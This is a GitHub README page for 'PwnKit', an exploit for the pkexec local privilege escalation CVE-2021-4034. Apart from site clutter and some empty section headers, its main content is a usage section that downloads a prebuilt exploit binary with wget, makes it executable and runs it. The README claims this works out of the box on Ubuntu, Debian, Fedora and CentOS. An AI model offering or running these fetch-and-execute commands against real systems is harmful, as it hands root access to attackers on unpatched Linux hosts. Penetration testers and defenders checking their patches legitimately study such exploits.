Skip to content

Latest commit

 

History

History
25 lines (15 loc) · 565 Bytes

README.md

File metadata and controls

25 lines (15 loc) · 565 Bytes

PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Usage

Should work out of the box on Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

wget https://github.com/ly4k/PwnKit/raw/main/PwnKit
chmod +x ./PwnKit
./PwnKit

Example

Technical Details

References